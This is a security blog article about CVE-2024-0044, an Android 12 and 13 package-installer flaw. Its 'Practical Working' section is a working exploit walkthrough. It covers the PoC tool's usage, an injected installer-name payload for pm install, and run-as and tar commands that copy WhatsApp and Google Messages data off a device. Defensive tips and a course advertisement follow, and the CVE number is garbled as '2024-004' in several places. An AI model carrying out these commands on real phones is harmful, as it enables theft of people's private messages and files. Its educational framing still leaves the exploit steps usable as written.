Ticker

6/recent/ticker-posts

Unlocking the Android 12 and 13 Vulnerability: CVE-2024-004) ADB Exploitation

Every time Android releases a new update, it aims to enhance security. However, vulnerabilities such as CVE-2024-004 still affect Android versions 12 and 13. If you’ve heard of ADB (Android Debug Bridge), you’ll know it’s meant for developers to communicate with an Android device. Still, attackers can take advantage of this tool to break into your phone and steal your private data, which is exactly what happens with this vulnerability. So, let’s break this down.

What we are going to learn in this article

>What is ADB?

>What is CVE-2024-004?

>How Do Hackers Use This?

>Practical Working

> Real-life Impact: Why Should You Care?

>How To Protect Yourself

>Why This Matters To Cybersecurity Pros

What is ADB?

ADB, or Android Debug Bridge, is a powerful tool that allows developers to communicate with and control an Android device from a computer. But when misused, especially with this vulnerability, it lets attackers enter your phone without you even knowing. If it is told with an example it can be leaving your main door open so anyone could enter your house without your permission.  

What is CVE-2024-004?

CVE-2024-004 is a serious vulnerability in Android 12 and 13 that permits hackers to pretend they’re any app on your phone. So, they can use ADB to sneak into apps, and peek at your messages, contacts, and even personal files—all without you doing anything! This happens because Android wasn’t properly checking what’s going on when apps are installed, especially when ADB is involved. Attackers can use this hole in the system to take control of the device​.

How Do Hackers Use This?

It’s simpler than it looks. If someone can get physical access to your Android phone or trick you into enabling ADB, they’re in. Here’s how it works:

  1. Access ADB: The attacker gets you to enable ADB or physically connect to your device. It could be through a USB cable or even wirelessly.

  2. Run Commands: Using specific scripts or commands, they can make Android think they’re a trusted app, which lets them access private data.

  3. Steal Data: Once inside, they can look at your unencrypted messages, contacts, and files. In some cases, they can even install other apps or modify what’s on your device​.

You may also like to read about  Windows Remote Kernel Exploitation via IPv6
 

Practical Working

CVE-2024-0044 is a serious security issue affecting Android versions 12 and 13. It involves a flaw in the createSessionInternal function of the PackageInstallerService.java file. This vulnerability allows an attacker to escalate their privileges locally without needing user interaction by exploiting inadequate input validation in the function. Essentially, they can manipulate the session creation process to gain unauthorized access to sensitive data and perform actions they shouldn't be able to.

Meta security discovered the problem, and Tiny Hack has shared a summary of the proof of concept. For details on the security fix, refer to the Android security bulletin.

Prerequired 

1. Turn on debugging on your mobile phone. Use a USB cable or wireless debugging to connect it to your system.

2. Download any apk on your system.

How to use the tool:

python cve_2024_004.py -h

usage: cve_2024_0044.py [-h] -P P -A A
CVE-2024-0044: run-as any app @Pl4int3xt

options:
  -h, --help   show this help message and exit
  -P P         package name (default: None) 
  -A A         apk file path (default: None)   

-P specifies the target package name you want to run

-A specifies the apk file to push into the device

Exploitation:

Make the tool run-

python3 cve_2024_0044.py -P com.whatsapp -A /home/pl4int3xt/Downloads/F-Droid.apk

A payload.txt file like this will be generated

pl4int3xt ~>  adb shell
pixel:/ $ PAYLOAD="@null
> victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
pixel:/ $ pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk
Success

Now we will get the WhatsApp data using these commands

pixel:/ $ mkdir /data/local/tmp/wa/                                                                            
pixel:/ $ touch /data/local/tmp/wa/wa.tar
pixel:/ $ chmod -R 0777 /data/local/tmp/wa/
pixel:/ $ run-as victim
pixel:/data/user/0 $ tar -cf /data/local/tmp/wa/wa.tar com.whatsapp

Create a temporary directory: mkdir /data/local/tmp/wa/

Create the placeholder for a tar file: touch /data/local/tmp/wa/wa.tar

Se wide-open permission: chmod -R 0777 /data/local/tmp/wa/ to ensure any user can read write and execute within this directory

Switch user control: run-as victim to gain the same permission as the "victim" user.

Archive the target application's data: tar -cf /data/local/tmp/wa/wa.tar com.whatsapp , creating a tarball of the WhatsApp data directory

Now we will take out Google messages

Use the following code
plaintext@archlinux ~/D/c/p/cve_2024_0044 (feature)> python3 ./cve_2024_0044.py -P com.google.android.apps.messaging -A ~/Down
loads/F-Droid.apk
Do the above task and after pulling out the  wa.tar file untar it and open conversation in
com.google.android.apps.messaging/databases/bugle_db use SQLite browser or any other tool.

Real-Life Impact: Why Should You Care?

The biggest risk here is data theft. For example, attackers can extract your WhatsApp messages or Google messages as shown above. That might not seem like much at first but just think about all the sensitive data that you have in those apps. Even worse, if your device isn’t patched with the latest updates, hackers could install malicious apps or take over the phone entirely.

How to Protect Yourself

Now that we know how dangerous this vulnerability is, here’s what you can do to stay safe:

  1. Update Your Device: Android has already released patches for this vulnerability in versions after 12L. Make sure your phone is running the latest security updates.
  2. Turn Off ADB: Most people don’t need ADB enabled, so it’s best to keep it off unless you’re a developer. Go to your Developer options and switch it off.
  3. Be Careful with Apps: Don’t install apps from unknown sources. Stick to official app stores like Google Play.
  4. Encrypt Your Data: This might sound technical, but it’s a great safeguard. If your phone’s data is encrypted, even if someone breaks in, they’ll have a hard time reading anything.

Why This Matters to Cybersecurity Pros

For those of you in cybersecurity, understanding this vulnerability is crucial. It shows just how powerful something like ADB can be, not just for developers but also for attackers. As cybersecurity experts, you can use this knowledge to help people secure their devices better or run penetration tests to ensure no one is vulnerable.

The CVE-2024-004 vulnerability is a reminder that even trusted tools like ADB can be misused. Whether you're an Android user or a cybersecurity expert, it's crucial to understand how these exploits work so that we can stay ahead of attackers. If you haven't already, update your device, disable unnecessary settings like ADB, and keep a close eye on your apps.

For more in-depth information and updates on the latest vulnerabilities, keep an eye on Hackersking's official Instagram and YouTube channel. We're here to help you stay informed and secure!

Join Complete Offensive-Hacking Course Today To Get 10% Special Off